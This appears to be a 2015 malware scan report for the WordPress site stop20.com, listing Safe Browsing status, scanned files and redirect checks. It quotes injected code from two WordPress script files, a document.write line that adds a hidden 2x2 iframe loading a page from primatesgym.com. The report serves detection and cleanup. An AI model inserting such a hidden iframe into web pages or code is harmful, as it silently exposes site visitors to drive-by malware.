Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stop20.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stop20.com/ | 200 OK Content-Length: 30809 Content-Type: text/html | clean |
http://stop20.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 465 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://primatesgym.com/weof.html?j=647755></iframe>'); function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://primatesgym.com/weof.html?j=647755 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://primatesgym.com/weof.html?j=647755> | ||
http://stop20.com/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91363 Content-Type: application/x-javascript | clean |
http://stop20.com/wp-content/themes/MyProduct/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.8 | 200 OK Content-Length: 8593 Content-Type: application/x-javascript | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://stop20.com/wp-content/themes/MyProduct/js/superfish.js | 200 OK Content-Length: 3714 Content-Type: application/x-javascript | clean |
http://stop20.com/wp-content/themes/MyProduct/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/x-javascript | clean |
http://stop20.com/wp-content/themes/MyProduct/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://stop20.com/wp-content/themes/MyProduct/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 5081 Content-Type: application/x-javascript | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://stop20.com/bleeders-and-eiph/ | 200 OK Content-Length: 37768 Content-Type: text/html | clean |
http://stop20.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 943 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://primatesgym.com/weof.html?j=647755></iframe>'); addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://primatesgym.com/weof.html?j=647755 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://primatesgym.com/weof.html?j=647755> | ||
http://stop20.com/stop20-for-horse-bleeding/ | 200 OK Content-Length: 27098 Content-Type: text/html | clean |
http://stop20.com/stop-20-ampm/ | 200 OK Content-Length: 27526 Content-Type: text/html | clean |
http://stop20.com/immuvet-program-2/ | 200 OK Content-Length: 26962 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stop20.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 21:24:09 GMT
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
X-Pingback: http://stop20.com/xmlrpc.php
GET / HTTP/1.1
Host: stop20.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 21:24:09 GMT
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
X-Pingback: http://stop20.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: stop20.com
Referer: http://www.google.com/search?q=stop20.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stop20.com
Referer: http://www.google.com/search?q=stop20.com
Result:
The result is similar to the first query. There are no suspicious redirects found.